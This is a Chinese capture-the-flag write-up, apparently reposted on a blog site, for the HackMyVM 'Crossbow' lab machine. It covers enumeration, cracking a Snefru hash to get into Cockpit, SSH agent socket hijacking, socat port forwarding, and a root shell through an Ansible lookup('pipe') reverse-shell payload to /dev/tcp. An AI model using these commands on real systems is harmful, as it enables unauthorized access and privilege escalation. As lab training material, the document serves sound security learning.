当前位置:   article > 正文

[HackMyVM]靶场Crossbow

[HackMyVM]靶场Crossbow

kali:192.168.56.104

靶机:192.168.56.136

端口扫描

  1. # nmap 192.168.56.136
  2. Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-26 22:17 CST
  3. Nmap scan report for crossbow.hmv (192.168.56.136)
  4. Host is up (0.0057s latency).
  5. Not shown: 997 closed tcp ports (reset)
  6. PORT STATE SERVICE
  7. 22/tcp open ssh
  8. 80/tcp open http
  9. 9090/tcp open zeus-admin

开了3个端口22 80 9090

先扫一下80 

  1. # gobuster dir -u http://192.168.56.136/ -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirb/common.txt
  2. ===============================================================
  3. Gobuster v3.6
  4. by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
  5. ===============================================================
  6. [+] Url: http://192.168.56.136/
  7. [+] Method: GET
  8. [+] Threads: 10
  9. [+] Wordlist: /usr/share/wordlists/dirb/common.txt
  10. [+] Negative Status codes: 404
  11. [+] User Agent: gobuster/3.6
  12. [+] Extensions: zip,html,txt,php,bak
  13. [+] Timeout: 10s
  14. ===============================================================
  15. Starting gobuster in directory enumeration mode
  16. ===============================================================
  17. /.html (Status: 403) [Size: 279]
  18. /.php (Status: 403) [Size: 279]
  19. /.hta.txt (Status: 403) [Size: 279]
  20. /.hta.php (Status: 403) [Size: 279]
  21. /.hta.bak (Status: 403) [Size: 279]
  22. /.htaccess.bak (Status: 403) [Size: 279]
  23. /.htaccess.zip (Status: 403) [Size: 279]
  24. /.htaccess.html (Status: 403) [Size: 279]
  25. /.htaccess (Status: 403) [Size: 279]
  26. /.htaccess.php (Status: 403) [Size: 279]
  27. /.hta.html (Status: 403) [Size: 279]
  28. /.htpasswd.html (Status: 403) [Size: 279]
  29. /.htpasswd.txt (Status: 403) [Size: 279]
  30. /.htpasswd.zip (Status: 403) [Size: 279]
  31. /.hta (Status: 403) [Size: 279]
  32. /.htpasswd.bak (Status: 403) [Size: 279]
  33. /.htpasswd (Status: 403) [Size: 279]
  34. /.hta.zip (Status: 403) [Size: 279]
  35. /.htaccess.txt (Status: 403) [Size: 279]
  36. /.htpasswd.php (Status: 403) [Size: 279]
  37. /index.html (Status: 200) [Size: 5205]
  38. /index.html (Status: 200) [Size: 5205]
  39. /server-status (Status: 403) [Size: 279]
  40. Progress: 27684 / 27690 (99.98%)
  41. ===============================================================
  42. Finished
  43. ===============================================================

没有什么东西,再扫一下9090

  1. # gobuster dir -u http://192.168.56.136:9090/ -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirb/common.txt
  2. ===============================================================
  3. Gobuster v3.6
  4. by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
  5. ===============================================================
  6. [+] Url: http://192.168.56.136:9090/
  7. [+] Method: GET
  8. [+] Threads: 10
  9. [+] Wordlist: /usr/share/wordlists/dirb/common.txt
  10. [+] Negative Status codes: 404
  11. [+] User Agent: gobuster/3.6
  12. [+] Extensions: html,txt,php,bak,zip
  13. [+] Timeout: 10s
  14. ===============================================================
  15. Starting gobuster in directory enumeration mode
  16. ===============================================================
  17. Error: the server returns a status code that matches the provided options for non existing urls. http://192.168.56.136:9090/bf206408-5c03-4480-b8c2-0b790b56c627 => 200 (Length: 11740). To continue please exclude the status code or the length

ok,不能扫

直接去web看一下

没什么叫交互功能

源码里发现两个js文件

  1. //config.js
  2. const API_ENDPOINT = "https://phishing.crossbow.hmv/data";
  3. const HASH_API_KEY = "49ef6b765d39f06ad6a20bc951308393";
  4. // Metadata for last system upgrade
  5. const SYSTEM_UPGRADE = {
  6. version: "2.3.1",
  7. date: "2023-04-15",
  8. processedBy: "SnefruTools V1",
  9. description: "Routine maintenance and security patches"
  10. }
  1. //app.js
  2. document.addEventListener("DOMContentLoaded", function() {
  3. fetch(API_ENDPOINT, {
  4. headers: {
  5. "Authorization": `Bearer ${API_KEY}`
  6. }
  7. })
  8. .then(response => response.json())
  9. .then(data => {
  10. if (data && Array.isArray(data.messages)) {
  11. const randomMessage = data.messages[Math.floor(Math.random() * data.messages.length)];
  12. const messageElement = document.createElement("blockquote");
  13. messageElement.textContent = randomMessage;
  14. messageElement.style.marginTop = "20px";
  15. messageElement.style.fontStyle = "italic";
  16. const container = document.querySelector(".container");
  17. container.appendChild(messageElement);
  18. }
  19. });
  20. });

在config.js提到一个域名还有一个hash值

先看域名

把phishing.crossbow.hmv添加到/etc/hosts

192.168.56.136 phishing.crossbow.hmv

再扫一下

  1. # gobuster dir -u http://phishing.crossbow.hmv/ -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirb/common.txt
  2. ===============================================================
  3. Gobuster v3.6
  4. by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
  5. ===============================================================
  6. [+] Url: http://phishing.crossbow.hmv/
  7. [+] Method: GET
  8. [+] Threads: 10
  9. [+] Wordlist: /usr/share/wordlists/dirb/common.txt
  10. [+] Negative Status codes: 404
  11. [+] User Agent: gobuster/3.6
  12. [+] Extensions: html,txt,php,bak,zip
  13. [+] Timeout: 10s
  14. ===============================================================
  15. Starting gobuster in directory enumeration mode
  16. ===============================================================
  17. /.html (Status: 403) [Size: 286]
  18. /.hta.html (Status: 403) [Size: 286]
  19. /.hta.txt (Status: 403) [Size: 286]
  20. /.hta.php (Status: 403) [Size: 286]
  21. /.hta.bak (Status: 403) [Size: 286]
  22. /.htaccess (Status: 403) [Size: 286]
  23. /.htaccess.txt (Status: 403) [Size: 286]
  24. /.htaccess.bak (Status: 403) [Size: 286]
  25. /.htaccess.zip (Status: 403) [Size: 286]
  26. /.htpasswd (Status: 403) [Size: 286]
  27. /.htpasswd.txt (Status: 403) [Size: 286]
  28. /.php (Status: 403) [Size: 286]
  29. /.htaccess.php (Status: 403) [Size: 286]
  30. /.htpasswd.bak (Status: 403) [Size: 286]
  31. /.htaccess.html (Status: 403) [Size: 286]
  32. /.htpasswd.html (Status: 403) [Size: 286]
  33. /.htpasswd.zip (Status: 403) [Size: 286]
  34. /.hta (Status: 403) [Size: 286]
  35. /.hta.zip (Status: 403) [Size: 286]
  36. /.htpasswd.php (Status: 403) [Size: 286]
  37. /index.html (Status: 200) [Size: 1202]
  38. /index.html (Status: 200) [Size: 1202]
  39. /server-status (Status: 403) [Size: 286]
  40. Progress: 27684 / 27690 (99.98%)
  41. ===============================================================
  42. Finished
  43. ===============================================================

无果

看一下界面

洁白如一张白纸

看一下9090端口

是一个登录界面

whatweb查一下

  1. # whatweb http://192.168.56.136:9090
  2. http://192.168.56.136:9090 [200 OK] Cookies[cockpit], Country[RESERVED][ZZ], HTML5, HttpOnly[cockpit], IP[192.168.56.136], PasswordField, Script[text/javascript], Title[Loading...], UncommonHeaders[content-security-policy,x-dns-prefetch-control,referrer-policy,x-content-type-options,cross-origin-resource-policy], X-Frame-Options[sameorigin]

也没有有用的信息,现在只剩下一个hash值能利用

  1. const API_ENDPOINT = "https://phishing.crossbow.hmv/data";
  2. const HASH_API_KEY = "49ef6b765d39f06ad6a20bc951308393";
  3. // Metadata for last system upgrade
  4. const SYSTEM_UPGRADE = {
  5. version: "2.3.1",
  6. date: "2023-04-15",
  7. processedBy: "SnefruTools V1",
  8. description: "Routine maintenance and security patches"
  9. }

有个processedBy Snefrutools V1,搜索一下相关信息

好像是一个加密工具

搜索Snefru 解密,得到一个解密网站

snefru256 hash decoder and calculator (md5hashing.net)

把hash放到右边解密

解密结果是 ELzkRudzaNXRyNuN6

根据博客作者Polo,猜测用户名是Polo,登录9090端口,测试发现用户名是polo

在终端里面反弹个shell到kali上

polo用户下没有user flag,也没有sudo -l权限,西巴

pspy64也跑不出来

用linpeas跑发现我在docker里面

  1. ╔══════════╣ Executing Linux Exploit Suggester 2
  2. ╚ https://github.com/jondonas/linux-exploit-suggester-2
  3. ╔══════════╣ Protections
  4. ═╣ AppArmor enabled? .............. /etc/apparmor.d
  5. ═╣ grsecurity present? ............ grsecurity Not Found
  6. ═╣ PaX bins present? .............. PaX Not Found
  7. ═╣ Execshield enabled? ............ Execshield Not Found
  8. ═╣ SELinux enabled? ............... sestatus Not Found
  9. ═╣ Seccomp enabled? ............... enabled
  10. ═╣ AppArmor profile? .............. docker-default (enforce)
  11. ═╣ User namespace? ................ enabled
  12. ═╣ Cgroup2 enabled? ............... enabled
  13. ═╣ Is ASLR enabled? ............... Yes
  14. ═╣ Printer? ....................... No
  15. ═╣ Is this a virtual machine? ..... Yes (docker)

看一下进程

  1. polo@crossbow:~$ ps aux
  2. USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
  3. root 1 1.9 1.5 36932 31144 ? Ss 13:49 1:14 /usr/bin/pyth
  4. root 7 0.0 0.0 2576 932 ? S 13:49 0:00 /bin/sh /usr/
  5. root 9 0.0 0.4 235352 8156 ? Sl 13:49 0:00 /usr/lib/cock
  6. root 14 0.0 1.2 201120 24572 ? S 13:49 0:00 /usr/sbin/apa
  7. lea 16 8.0 0.1 4564 3408 ? S 13:49 5:16 /bin/bash /ho
  8. root 22 0.0 0.1 3976 2064 ? Ss 13:49 0:00 /usr/sbin/cro
  9. root 31 0.0 0.1 15404 3320 ? Ss 13:49 0:00 sshd: /usr/sb
  10. lea 1082 0.0 0.1 7792 3040 ? Ss 13:50 0:00 ssh-agent
  11. www-data 125718 0.0 0.6 201856 12836 ? S 14:05 0:01 /usr/sbin/apa
  12. www-data 125722 0.0 0.6 201732 12604 ? S 14:05 0:01 /usr/sbin/apa
  13. www-data 125723 0.0 0.6 201704 12584 ? S 14:05 0:02 /usr/sbin/apa
  14. www-data 288598 0.0 0.6 201704 12516 ? S 14:18 0:01 /usr/sbin/apa
  15. www-data 288614 0.0 0.6 201848 12820 ? S 14:18 0:01 /usr/sbin/apa
  16. www-data 288616 0.0 0.6 201856 12816 ? S 14:18 0:01 /usr/sbin/apa
  17. www-data 360679 0.0 0.6 201704 12516 ? S 14:24 0:00 /usr/sbin/apa
  18. www-data 360696 0.0 0.6 201704 12516 ? S 14:25 0:00 /usr/sbin/apa
  19. www-data 360697 0.0 0.6 201704 12496 ? S 14:25 0:00 /usr/sbin/apa
  20. www-data 360717 0.0 0.6 201704 12520 ? S 14:25 0:00 /usr/sbin/apa
  21. root 517596 0.0 0.2 11660 5400 ? S 14:38 0:00 /usr/lib/cock
  22. polo 517616 0.0 0.0 7660 772 ? Ss 14:38 0:00 /usr/bin/ssh-
  23. polo 517627 0.0 0.5 309656 11236 ? Sl 14:38 0:00 cockpit-bridg
  24. polo 517629 0.0 0.2 8988 4136 ? S 14:38 0:00 dbus-daemon -
  25. root 523850 0.0 0.2 7296 4464 ? S 14:38 0:00 sudo -k -A co
  26. polo 523854 0.0 0.1 8860 2092 ? S 14:38 0:00 /usr/lib/cock
  27. polo 527219 0.0 0.1 4608 3644 pts/0 Ss 14:39 0:00 /bin/bash
  28. polo 588905 14.2 1.2 106140 25248 ? Sl 14:45 1:25 ./pspy64
  29. polo 604208 15.1 1.0 106140 21412 ? Sl 14:47 1:12 ./pspy64
  30. polo 606536 0.0 0.1 4344 2968 pts/0 S 14:47 0:00 bash -c bash
  31. polo 606538 0.0 0.1 4608 3716 pts/0 S 14:47 0:00 bash -i
  32. polo 607089 0.1 0.0 2936 1000 pts/0 S+ 14:47 0:00 /usr/bin/scri
  33. polo 607090 0.0 0.1 4608 3560 pts/3 Ss 14:47 0:00 /bin/bash
  34. polo 629543 0.0 0.0 78696 820 ? Ss 14:51 0:00 gpg-agent --h
  35. polo 657840 33.3 0.2 8536 4156 pts/3 R+ 14:55 0:00 ps aux

发现lea 这个用户开启了 ssh代理

可以利用ssh代理劫持进入其他系统,这里有篇利用文章

SSH Forward Agent exploitation | HackTricks | HackTricks

去tmp看下

  1. polo@crossbow:/tmp$ ls -al
  2. total 3024
  3. drwxrwxrwt 4 root root 4096 Mar 26 14:50 .
  4. drwxr-xr-x 1 root root 4096 Dec 14 18:17 ..
  5. srwxrwxrwx 1 polo polo 0 Mar 26 14:38 dbus-TD9eVzQl3e
  6. -rwxr-xr-x 1 polo polo 3078592 Mar 1 13:49 pspy64
  7. drwx------ 2 polo polo 4096 Mar 26 14:38 ssh-XXXXXXRpQnqX
  8. drwx------ 2 lea lea 4096 Mar 26 13:50 ssh-XXXXXXZsi

看见lea的代理文件 ssh-XXXXXXZsiuGq

但是不知道pid,爆破一下

for i in {1080..1090}; do SSH_AUTH_SOCK=ssh-XXXXXXZsiuGq/agent.$i ssh lea@192.168.56.136; done

失败,看一下/etc/passwd,发现还有一个用户pedro

  1. root:x:0:0:root:/root:/usr/bin/zsh
  2. daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
  3. bin:x:2:2:bin:/bin:/usr/sbin/nologin
  4. sys:x:3:3:sys:/dev:/usr/sbin/nologin
  5. sync:x:4:65534:sync:/bin:/bin/sync
  6. games:x:5:60:games:/usr/games:/usr/sbin/nologin
  7. man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
  8. lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
  9. mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
  10. news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
  11. uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
  12. proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
  13. www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
  14. backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
  15. list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
  16. irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
  17. _apt:x:42:65534::/nonexistent:/usr/sbin/nologin
  18. nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
  19. systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
  20. systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
  21. messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
  22. avahi-autoipd:x:101:109:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
  23. sshd:x:102:65534::/run/sshd:/usr/sbin/nologin
  24. mysql:x:103:111:MySQL Server,,,:/nonexistent:/bin/false
  25. pedro:x:1002:1002:,,,:/home/pedro:/bin/zsh

再爆破

  1. for i in {1080..1090}; do SSH_AUTH_SOCK=ssh-XXXXXXZsiuGq/agent.$i ssh pedro@192.168.56.136; doneSOCK=ssh-XXXXXXZsiuGq/agent.$i ssh pedro@192.168.56.136; done
  2. The authenticity of host '192.168.56.136 (192.168.56.136)' can't be established.
  3. ED25519 key fingerprint is SHA256:TCA/ssXFaEc0sOJl0lvYyqTVTrCpkF0wQfyj5mJsALc.
  4. This host key is known by the following other names/addresses:
  5. ~/.ssh/known_hosts:1: [hashed name]
  6. ~/.ssh/known_hosts:4: [hashed name]
  7. ~/.ssh/known_hosts:5: [hashed name]
  8. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
  9. Warning: Permanently added '192.168.56.136' (ED25519) to the list of known hosts.
  10. pedro@192.168.56.136's password:
  11. Permission denied, please try again.
  12. pedro@192.168.56.136's password:
  13. Permission denied, please try again.
  14. pedro@192.168.56.136's password:
  15. pedro@192.168.56.136: Permission denied (publickey,password).
  16. Last login: Fri Dec 15 18:56:12 2023 from 172.17.0.2
  17. ╭─pedro@crossbow ~
  18. ╰─$

密码不用输一直回车就能拿到padro的shell

也是成功拿到user flag,怪不得polo和lea都没有user flag,原来还有一个user

  1. ╭─pedro@crossbow ~
  2. ╰─$ ls -al
  3. total 220
  4. drwx------ 6 pedro pedro 4096 Mar 26 16:07 .
  5. drwxr-xr-x 3 root root 4096 Sep 5 2023 ..
  6. -rw-r--r-- 1 pedro pedro 220 Aug 30 2023 .bash_logout
  7. -rw-r--r-- 1 pedro pedro 3526 Aug 30 2023 .bashrc
  8. drwx------ 3 pedro pedro 4096 Sep 16 2023 .gnupg
  9. drwxr-xr-x 3 pedro pedro 4096 Sep 15 2023 .local
  10. drwxr-xr-x 12 pedro pedro 4096 Dec 14 18:55 .oh-my-zsh
  11. -rw-r--r-- 1 pedro pedro 807 Aug 30 2023 .profile
  12. drwx------ 2 pedro pedro 4096 Dec 14 18:49 .ssh
  13. -rw-r--r-- 1 pedro pedro 51851 Dec 15 18:56 .zcompdump-crossbow-5.9
  14. -r--r--r-- 1 pedro pedro 120032 Dec 15 18:56 .zcompdump-crossbow-5.9.zwc
  15. -rw------- 1 pedro pedro 53 Mar 26 16:07 .zsh_history
  16. -rw-r--r-- 1 pedro pedro 3890 Aug 30 2023 .zshrc
  17. -rwx------ 1 pedro pedro 33 Sep 5 2023 user.txt

想办法提权

看端口

  1. ╭─pedro@crossbow ~
  2. ╰─$ ss -tulnp 1
  3. Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
  4. udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
  5. tcp LISTEN 0 4096 0.0.0.0:9090 0.0.0.0:*
  6. tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
  7. tcp LISTEN 0 4096 127.0.0.1:3000 0.0.0.0:*
  8. tcp LISTEN 0 4096 0.0.0.0:80 0.0.0.0:*
  9. tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
  10. tcp LISTEN 0 4096 [::]:9090 [::]:*
  11. tcp LISTEN 0 4096 [::]:80 [::]:*
  12. tcp LISTEN 0 128 [::]:22 [::]:*

3000端口只能在localhost下访问

进行端口转发用了ssh和nc一下就断了不知道为什么

用socat

socat TCP4-LISTEN:8080,fork TCP4:127.0.0.1:3000 
  1. ╭─pedro@crossbow ~
  2. ╰─$ socat TCP4-LISTEN:8080,fork TCP4:127.0.0.1:3000 & 1
  3. [1] 800897

到web一看是个登录界面

弱口令admin/admin成功登录

在environment里面编辑

利用Ansible playbookjson的内置函数lookup反弹个shell并添加配置环境

  1. {
  2. "ansible_user": "{{ lookup('ansible.builtin.pipe', \"bash -c 'exec bash -i &>/dev/tcp/192.168.56.104/4567 <&1'\") }}"
  3. }
  1. {
  2. "LC_ALL":"en_US.UTF-8",
  3. "LANG":"en_US.UTF-8"
  4. }

然后在任务模板里面执行这个任务

kali监听一下就能拿到root权限

  1. # nc -lvnp 4567
  2. listening on [any] 4567 ...
  3. connect to [192.168.56.104] from (UNKNOWN) [192.168.56.136] 44338
  4. bash: impossible de régler le groupe de processus du terminal (645): Ioctl() inapproprié pour un périphérique
  5. bash: pas de contrôle de tâche dans ce shell
  6. root@crossbow:/root# cat /root/r*
  7. cat /root/r*
  8. 7a299c41b1daac46d5ab98745b212e09
  9. root@crossbow:/root#

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/正经夜光杯/article/detail/993941
推荐阅读
相关标签
  

闽ICP备14008679号